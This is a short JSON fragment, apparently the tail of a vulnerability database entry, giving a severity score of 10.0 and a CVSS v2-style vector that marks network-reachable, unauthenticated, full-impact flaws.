{"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
